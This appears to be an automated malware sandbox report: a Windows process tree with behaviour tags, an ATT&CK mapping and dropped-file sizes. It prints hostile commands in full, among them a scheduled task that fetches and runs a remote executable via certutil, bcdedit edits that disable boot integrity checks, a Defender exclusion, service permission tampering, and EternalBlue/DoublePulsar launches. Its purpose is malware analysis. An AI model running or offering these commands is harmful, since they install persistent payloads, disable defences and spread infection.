C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 05⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 15⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 05⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}5⤵
- Modifies boot configuration data using bcdedit
-
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe4⤵
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exeC:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe4⤵
- Modifies data under HKEY_USERS
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeC:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exeC:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exeC:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"5⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=4837da26-6de3-4882-8e13-bdeda36ab7b1&browser=chrome6⤵
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef2546e00,0x7fef2546e10,0x7fef2546e207⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1068,4131382827917634582,8429139561253154187,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1264 /prefetch:87⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1068,4131382827917634582,8429139561253154187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:87⤵
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings7⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13f547740,0x13f547750,0x13f5477608⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1068,4131382827917634582,8429139561253154187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:87⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exeC:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exeC:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exeC:\Users\Admin\AppData\Local\Temp\csrss\m672.exe4⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.684⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.844⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\gejMQbmxRzJXqHJLkzNGwXS\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\gejMQbmxRzJXqHJLkzNGwXS\Eternalblue-2.2.0.exe4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\gejMQbmxRzJXqHJLkzNGwXS\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\gejMQbmxRzJXqHJLkzNGwXS\Doublepulsar-1.3.1.exe4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\gejMQbmxRzJXqHJLkzNGwXS\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\gejMQbmxRzJXqHJLkzNGwXS\Eternalblue-2.2.0.exe4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\gejMQbmxRzJXqHJLkzNGwXS\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\gejMQbmxRzJXqHJLkzNGwXS\Doublepulsar-1.3.1.exe4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D368.exeC:\Users\Admin\AppData\Local\Temp\D368.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-BFJ7D.tmp\D368.tmp"C:\Users\Admin\AppData\Local\Temp\is-BFJ7D.tmp\D368.tmp" /SL5="$402AE,330470,246784,C:\Users\Admin\AppData\Local\Temp\D368.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\is-07HKK.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-07HKK.tmp\kkkk.exe" /S /UID=lab2123⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: MapViewOfSection
-
C:\Program Files\Common Files\DVAUBZTRKC\prolab.exe"C:\Program Files\Common Files\DVAUBZTRKC\prolab.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\is-BON8O.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-BON8O.tmp\prolab.tmp" /SL5="$702A8,575243,216576,C:\Program Files\Common Files\DVAUBZTRKC\prolab.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
-
-
C:\Users\Admin\AppData\Local\Temp\ce-b563f-5da-fd9bf-93bdaf6622cea\Dilibaeshygi.exe"C:\Users\Admin\AppData\Local\Temp\ce-b563f-5da-fd9bf-93bdaf6622cea\Dilibaeshygi.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pd4mmcec.o3l\lod.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\pd4mmcec.o3l\lod.exeC:\Users\Admin\AppData\Local\Temp\pd4mmcec.o3l\lod.exe6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
-
C:\ProgramData\77ESgb5Vm5jAwXHdGuxgUcKzR.tmpC:\ProgramData\77ESgb5Vm5jAwXHdGuxgUcKzR.tmp7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"8⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rrbwf01v.jtt\privacytools5.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\rrbwf01v.jtt\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\rrbwf01v.jtt\privacytools5.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\rrbwf01v.jtt\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\rrbwf01v.jtt\privacytools5.exe7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\igbhgvmz.dbh\app.exe /8-2222 & exit5⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\igbhgvmz.dbh\app.exeC:\Users\Admin\AppData\Local\Temp\igbhgvmz.dbh\app.exe /8-22226⤵
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\App Deploy"7⤵
- Drops file in Program Files directory
-
-
C:\Program Files (x86)\App Deploy\7za.exe"C:\Program Files (x86)\App Deploy\7za.exe" e -p31337 winamp-plugins.7z7⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\App Deploy\app.exe" -map "C:\Program Files (x86)\App Deploy\WinmonProcessMonitor.sys""7⤵
-
C:\Program Files (x86)\App Deploy\app.exe"C:\Program Files (x86)\App Deploy\app.exe" -map "C:\Program Files (x86)\App Deploy\WinmonProcessMonitor.sys"8⤵
- Drops file in Program Files directory
- Suspicious behavior: LoadsDriver
-
-
-
C:\Program Files (x86)\App Deploy\7za.exe"C:\Program Files (x86)\App Deploy\7za.exe" e -p31337 winamp.7z7⤵
- Drops file in Program Files directory
-
-
C:\Program Files (x86)\App Deploy\app.exe"C:\Program Files (x86)\App Deploy\app.exe" /8-22227⤵
-
C:\Program Files (x86)\App Deploy\app.exe"C:\Program Files (x86)\App Deploy\app.exe" /8-22228⤵
- Modifies data under HKEY_USERS
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D913.exeC:\Users\Admin\AppData\Local\Temp\D913.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f1⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\E120.exeC:\Users\Admin\AppData\Local\Temp\E120.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "17433241431552260876-83605564218335802381299544377540010866505463391137368547"1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\C8C1.tmp.exeC:\Users\Admin\AppData\Local\Temp\C8C1.tmp.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\CC2B.tmp.exeC:\Users\Admin\AppData\Local\Temp\CC2B.tmp.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 9122⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\F7DD.tmp.exeC:\Users\Admin\AppData\Local\Temp\F7DD.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1EC.tmp.exeC:\Users\Admin\AppData\Local\Temp\1EC.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\EAA.tmp.exeC:\Users\Admin\AppData\Local\Temp\EAA.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\334B.tmp.exeC:\Users\Admin\AppData\Local\Temp\334B.tmp.exe1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Modifies system certificate store
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 12⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\334B.tmp.exe"C:\Users\Admin\AppData\Local\Temp\334B.tmp.exe"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 16122⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8CFE7CD8-7703-4AE1-91B0-0A7144D5FBAE} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Local\60a1e36b-9660-45eb-8cce-bb867ac9c653\6DA2.exeC:\Users\Admin\AppData\Local\60a1e36b-9660-45eb-8cce-bb867ac9c653\6DA2.exe --Task2⤵
-
-
C:\Users\Admin\AppData\Roaming\urubfueC:\Users\Admin\AppData\Roaming\urubfue2⤵
-
-
C:\Users\Admin\AppData\Roaming\caubfueC:\Users\Admin\AppData\Roaming\caubfue2⤵
-
C:\Users\Admin\AppData\Roaming\caubfueC:\Users\Admin\AppData\Roaming\caubfue3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\eeubfueC:\Users\Admin\AppData\Roaming\eeubfue2⤵
-
-
C:\Users\Admin\AppData\Local\60a1e36b-9660-45eb-8cce-bb867ac9c653\6DA2.exeC:\Users\Admin\AppData\Local\60a1e36b-9660-45eb-8cce-bb867ac9c653\6DA2.exe --Task2⤵
-
-
C:\Users\Admin\AppData\Local\60a1e36b-9660-45eb-8cce-bb867ac9c653\6DA2.exeC:\Users\Admin\AppData\Local\60a1e36b-9660-45eb-8cce-bb867ac9c653\6DA2.exe --Task2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\D084.tmp.exeC:\Users\Admin\AppData\Local\Temp\D084.tmp.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
2File and Directory Permissions Modification
1Impair Defenses
2Install Root Certificate
1Modify Registry
6Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
200KB
-
Filesize
68KB
-
Filesize
152KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
152KB
-
Filesize
8.1MB
-
Filesize
348KB
-
Filesize
4KB
-
Filesize
40KB
-
Filesize
52KB
-
Filesize
68KB
-
Filesize
292KB
-
Filesize
292KB
-
Filesize
48KB
-
Filesize
4.7MB
-
Filesize
964KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
132KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
3.2MB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
92KB
-
Filesize
68KB
-
Filesize
84KB
-
Filesize
76KB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
2.5MB
-
Filesize
68KB
-
Filesize
1.2MB
-
Filesize
68KB
-
Filesize
1.1MB
-
Filesize
6.7MB
-
Filesize
68KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4.7MB
-
Filesize
1.9MB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
276KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
8KB
-
Filesize
8.1MB
-
Filesize
68KB
-
Filesize
8.1MB
-
Filesize
8.1MB
-
Filesize
8.0MB
-
Filesize
52KB
-
Filesize
840KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8.1MB
-
Filesize
560KB
-
Filesize
560KB
-
Filesize
4.0MB
-
Filesize
68KB
-
Filesize
1.6MB
-
Filesize
4.0MB
-
Filesize
4KB
-
Filesize
4.6MB
-
Filesize
84KB
-
Filesize
64KB
-
Filesize
24KB
-
Filesize
2.1MB
-
Filesize
204KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
8.5MB
-
Filesize
68KB
-
Filesize
8.4MB
-
Filesize
8.5MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
196KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
52KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
464KB
-
Filesize
428KB
-
Filesize
6.9MB
-
Filesize
24KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
16KB
-
Filesize
68KB
-
Filesize
52KB
-
Filesize
44KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
14B
-
Filesize
14B
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
14B
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
48KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
124KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
200KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
28KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
248KB
-
Filesize
240KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
584KB
-
Filesize
68KB
-
Filesize
580KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
232KB
-
Filesize
580KB
-
Filesize
584KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
36KB
-
Filesize
60KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
24KB
-
Filesize
44KB
-
Filesize
4KB
-
Filesize
14B
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
14B
-
Filesize
14B
-
Filesize
28KB
-
Filesize
44KB
-
Filesize
8KB
-
Filesize
36KB
-
Filesize
20KB
-
Filesize
68KB
-
Filesize
68KB